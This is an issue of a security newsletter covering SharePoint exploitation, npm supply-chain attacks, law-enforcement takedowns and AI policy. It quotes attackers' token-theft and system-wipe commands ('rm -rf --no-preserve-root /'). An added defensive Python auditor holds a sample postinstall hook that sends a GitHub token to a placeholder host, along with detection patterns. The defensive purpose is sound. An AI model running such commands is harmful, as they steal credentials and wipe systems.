🎓️ Vulnerable U | #126
SharePoint!!!! - oh and other things: Massive npm supply chain attack, Trump's AI Action Plan, A few law enforcement wins, and much more!
Read Time: 9 minutes
Howdy friends!
It’s been a no good awful week. Tires got slashed, a bunch of challenges professionally, and then got some really bad news about a good friend’s health.
I have been live streaming a bunch lately on TikTok, IG, YouTube, and Twitch - and my chat is flooded with questions about how to advance your career. “What certs should I get?!” - My advice is constantly the same: I don’t care about certs. If you’re the kind of person that needs to register for a marathon in order to motivate and train to run, go nuts and sign up for a class/test if it gets you to learn. - But at the end of the day it’s all about the people and relationships. Everything around you is people. (Soylent Green reference here).
Become obsessed with a niche, learn and do all you can within it, and spend the rest of your energy building relationships and meeting people. If you’re hoping the right cert acronym will get your resume through the HR filter, you’re already fighting a losing battle. Go buy someone a coffee or a beer, build trust, stand in front of a pile of proof of your knowledge in whatever form you can think of (blog, videos, github, conference talks, bug bounty rewards, etc.).
Anyway, I’m waxing on about this because the “everything is people” mantra also means people are everything.
Pretty heavy fuckin way to transition into: Let's hang in Vegas! A bunch of you were into a meetup on Thursday. I rented a cabana by the Mandalay Pool.
ICYMI
🖊️ Something I wrote: threat intel report on North Korean threat actors who keep getting hired for remote jobs at US companies.
🎧️ Something I heard: hard to have not watched at least some of this. Hunter Biden interview with channel 5.
🎤 Something I said: biggest security vulnerability of 2025?
🔖 Something I read: My homie Robbie who helped me lose 40lbs and gave me my favorite weight training protocol yet is loving working with cyber nerds. Not a paid promo, just think he’s a great coach who jives with us stressed and busy nerds.
Vulnerable News
This SharePoint vuln is all anyone can talk about all week. I made some content on it when the vuln dropped and my comments and inbox were filled with “yeah but who runs self hosted SharePoint?” since the M365 version isn’t impacted. My response… all the most important targets. Case in point: the US nuclear safety administration.
Microsoft has been great at updating the threat intel report linked here, and a recent update is that Chinese threat actor Storm-2603 is deploying Warlock ransomware. This is a relatively new RaaS that emerged in June with a hilariously brazen forum ad promising Lamborghinis to potential affiliates. While Storm-2603 isn't confirmed as state-backed like their countrymen Linen and Violet Typhoon (who are also exploiting this vuln), they've managed to hit some seriously high-value targets.
Eye Security reports 400+ orgs compromised globally, including several US federal agencies. The National Nuclear Security Administration (yes, the folks managing nuclear weapons) got hit on July 18, along with NIH and DHS. While agencies are downplaying the impact - DOE claims "minimal impact" and no classified data breach - CISA's acting like this is far from over. The US is taking the brunt of these attacks at 13% of global targets, and ESET confirms these aren't random hits but specifically targeted government orgs. (read more)
Join top fraud and cybersecurity leaders to hear how automation is reshaping financial cyber crime and what you can do about it.
🗓️ Thursday, July 31
⏰ 2 PM ET / 11 AM PT
🎙️ Featuring experts:
Allison Miller – Led fraud and cyber teams at Reddit, Google, PayPal, Visa, Bank of America, EA
Kitboga – Scam-baiting improv artist (3.7M+ YouTube subscribers)
Jerry Tylman – Led Fraud Red Teaming for top banks
Brian Silverstein – CEO, MirrorTab; former CTO & Co-founder of Honey (acquired by PayPal)
*Sponsored
After compromising maintainer accounts through spoofed emails, attackers have now hijacked the popular "is" package (2.8M weekly downloads) and embedded a JavaScript malware loader that's fully cross-platform.
Toptal got owned hard and someone used their GitHub org to push out some nasty npm packages. Socket's researchers caught 10 malicious packages from Toptal's Picasso design system that racked up around 5,000 downloads before getting nuked. The attack was pretty brutal - the malicious code would first steal your GitHub auth tokens via "gh auth token" and send them to a webhook, then try to completely wipe your system with "sudo rm -rf --no-preserve-root /" on Unix or "rm /s /q" on Windows.
73 repositories went public within a 5-minute window, suggesting either a compromised account with broad access or some automation. The attackers embedded their payload right in the package.json lifecycle hooks, so just installing these packages would trigger the destruction sequence. Toptal moved fast to deprecate the malicious versions once they caught wind, but this is another reminder that supply chain attacks are getting nastier and more destructive. (read more)
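The point about package.json lifecycle hooks is the part worth internalizing: npm runs scripts named preinstall, install, postinstall and prepare automatically during an install, so a payload placed there never needs the victim to run anything on purpose. The script below is an added example (not code from Socket, Toptal, or this newsletter) that audits a package.json for install-time hooks and flags ones that read credentials, make network calls, or delete recursively. The two package.json documents and the indicator patterns are constructed for illustration; the pattern list is an assumption you would tune for your own environment, and anything that matches a hook but no pattern is still reported as "needs review", since a hook that runs a bundled script file is exactly how a loader hides.

```python
import json
import re

# npm executes these script names on its own during `npm install`, so a
# payload here runs without the user ever invoking it explicitly.
INSTALL_LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare", "prepublish")

# Constructed indicators for review (assumption: tune these for your environment).
SUSPICIOUS_PATTERNS = {
    "credential_read": re.compile(r"\bgh\s+auth\s+token\b"),
    "network_send": re.compile(r"\b(curl|wget|Invoke-WebRequest|fetch)\b"),
    "recursive_delete": re.compile(r"\brm\s+(-[a-zA-Z]*r[a-zA-Z]*|/s)\b"),
}

# Constructed sample: a hook that harvests a GitHub token and posts it to a
# placeholder host (the ".invalid" TLD never resolves).
MALICIOUS_PACKAGE_JSON = json.dumps({
    "name": "constructed-example-pkg",
    "version": "0.0.1",
    "scripts": {
        "postinstall": "gh auth token | curl -s -X POST -d @- https://webhook.example.invalid/collect",
        "test": "echo ok",
    },
})

# Constructed sample: a common legitimate hook that still deserves a look.
REVIEW_PACKAGE_JSON = json.dumps({
    "name": "constructed-hook-pkg",
    "version": "1.2.3",
    "scripts": {"prepare": "husky install", "build": "tsc"},
})

# Constructed sample: no install-time hooks at all.
BENIGN_PACKAGE_JSON = json.dumps({
    "name": "constructed-clean-pkg",
    "version": "2.0.0",
    "scripts": {"build": "tsc", "test": "jest"},
})


def audit_package_json(text):
    """Return a list of (hook, finding, command) tuples for a package.json string.

    Each install-time hook produces at least one finding: one per matched
    indicator, or 'lifecycle_hook_present' when nothing matched but the hook
    exists and should be read by a human before the package is installed.
    """
    pkg = json.loads(text)
    scripts = pkg.get("scripts") or {}
    findings = []
    for hook in INSTALL_LIFECYCLE_HOOKS:
        cmd = scripts.get(hook)
        if not isinstance(cmd, str) or not cmd.strip():
            continue
        matched = False
        for name, pattern in SUSPICIOUS_PATTERNS.items():
            if pattern.search(cmd):
                findings.append((hook, name, cmd))
                matched = True
        if not matched:
            findings.append((hook, "lifecycle_hook_present", cmd))
    return findings


def verdict(findings):
    """Collapse findings into 'block', 'review', or 'clean' for a CI gate."""
    if any(name != "lifecycle_hook_present" for _, name, _ in findings):
        return "block"
    return "review" if findings else "clean"


if __name__ == "__main__":
    for label, doc in (("malicious", MALICIOUS_PACKAGE_JSON),
                       ("review", REVIEW_PACKAGE_JSON),
                       ("benign", BENIGN_PACKAGE_JSON)):
        found = audit_package_json(doc)
        print(f"{label}: {verdict(found)}")
        for hook, name, cmd in found:
            print(f"  {hook}: {name}: {cmd}")
```

Running this over every package.json in node_modules after a dry-run install is one cheap gate; the other is to stop npm from running hooks at all with `npm install --ignore-scripts` (or `ignore-scripts=true` in .npmrc) and then allowlist the few packages that genuinely need a build step.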
Big takedown in Kyiv - Europol nabbed the admin of XSS[.]is (formerly DaMaGeLaB), one of the major Russian-speaking cybercrime forums. The admin, who's been in the game for nearly 20 years, also operated thesecure[.]biz, a private messaging platform for criminals, pulling in about €7M from these ventures. XSS[.]is itself had 50k users and was basically a one-stop shop for stolen data, hacking tools, and an escrow service for criminal transactions.
This arrest ties into a broader crackdown on pro-Russian cyber operations. Just last week, Europol disrupted NoName057(16)'s infrastructure and arrested two people running DDoS attacks against Ukraine and allies. (read more)
Trump's CISA nominee Sean Plankey had his confirmation hearing this week and it went pretty smoothly. The guy's got solid cyber credentials - former Coast Guard cyber leader, worked at DOE and the NSC during Trump's first term. He pledged to ask DHS Secretary Kristi Noem for more funding if CISA needs it, and he's backing the reauthorization of that 2015 cybersecurity info-sharing law that's set to expire in September.
The hearing had the expected political theater - Republicans grilled him about Biden-era "censorship" (which he promised to dial back), while Democrats tried to pin him down on 2020 election integrity. Plankey basically said "I'm a cyber guy, not an election auditor" and deflected. His nomination was already delayed once over security clearance paperwork, and now Sen. Wyden's got a hold on it because CISA won't release some unclassified telecom security report. Still, the cybersecurity community seems to like the pick, so he'll probably get through eventually. (read more)
Trump dropped his AI Action Plan this week, and it's basically Big Tech's Christmas wish list wrapped in "beat China" rhetoric. The 90+ policy recommendations boil down to gutting regulations, letting Silicon Valley run wild, and making sure AI stays ideologically "pure" (whatever that means). They're pushing to reverse Biden-era AI oversight, threaten to pull federal funding from states with AI regulations, and only give government contracts to AI companies that promise to be "objective and free from bias."
The plan's three pillars sound reasonable enough - innovation, infrastructure, and international leadership - but the execution is pure deregulation fever dream. They're literally telling agencies to back off investigations that might "burden AI innovation" and want to build energy infrastructure by rejecting "radical climate dogma." Critics are already calling it out as Big Tech capturing policy, which... yeah, when your AI czar is David Sacks and you're announcing $100 billion joint ventures with OpenAI, that's not exactly subtle. The cybersecurity implications of rushing AI deployment without proper oversight should be fun to watch unfold. (read more)
Researchers just dropped some intel on a nasty new loader called CastleLoader that's been making rounds since earlier this year. They're using fake GitHub repos that mimic legit tools and those annoying ClickFix phishing attacks where they trick you into running PowerShell commands. (read more)
This is a fun one by the folks at Trustwave. Who knew about these Dark Web travel agencies? These aren't just sketchy booking sites - they're full-service criminal operations offering everything from luxury Dubai hotels to budget European hostels, all powered by stolen credit cards and compromised loyalty accounts. The whole thing runs through Telegram channels where you message directly with operators who manually book your trip using someone else's stolen data. They're making it look legit with customer reviews and "rebooking guarantees" while charging 30-70% below market rates.
When platforms like Rentalcars[.]com shut them down, they just disappear for a few months then pop back up with new workarounds. The travel industry is responding - airlines and airports are dumping record amounts into cybersecurity, with 66% of airlines calling it their top priority. But it's classic whack-a-mole territory. These agencies democratized fraud across all price points, so it's not just luxury brands getting hit anymore - every hotel chain and booking platform is fair game. (read more)
The DOJ and FBI took down four major dark web CSAM sites and landed 18 convictions totaling over 300 years in prison. The latest sentencing was Thomas Peter Katsampes from Minnesota, who got hit with 250 months (over 20 years) plus lifetime supervised release for working his way up to a staff position on one of these sites. These weren't small-time operations - some of the most heinous sites on the dark web with dedicated sections for infants and detailed guides on avoiding law enforcement.
The operation went international, with arrests spanning the UK, Netherlands, Italy, Germany, and several other countries. What's really grim is how organized these sites were - they had staff meetings, promotion systems, and user management just like any other business. The sentences have been appropriately heavy, with one defendant getting life in prison and others receiving decades behind bars. (read more)
Hey! Security isn’t a “nice to have” situation!
A single weak password just killed off a 158-year-old company and put 700 people out of work. KNP, a Northamptonshire transport firm, got hit by the Akira ransomware gang who managed to guess an employee's password and then encrypted everything. The hackers wanted up to £5m to unlock the data - money the company simply didn't have. So that was it, game over for a business that had survived since the 1860s.
I mean, sure, a weak password is bad, but really it’s also the complete lack of any security infrastructure beyond that. 2FA? Backups? Any sort of business continuity plan?
The director of KNP hasn't even told the employee whose password got cracked that they're probably responsible for destroying the company. "Would you want to know if it was you?" he asks. Fair point, honestly. (read more)
Miscellaneous mattjay
How'd I do this edition? It's hard doing this in a vacuum. Screaming into a void. Feedback is incredibly valuable to make sure I'm making a newsletter you love getting every week.
Parting Thoughts:
Community was foundational in launching and propelling my career. Community is the only reason I can stand being in Texas during the summer months. Community is the point. Today, I invite you to embrace discomfort on the road to a more vulnerable you.
Stay safe, Matt Johansen
@mattjay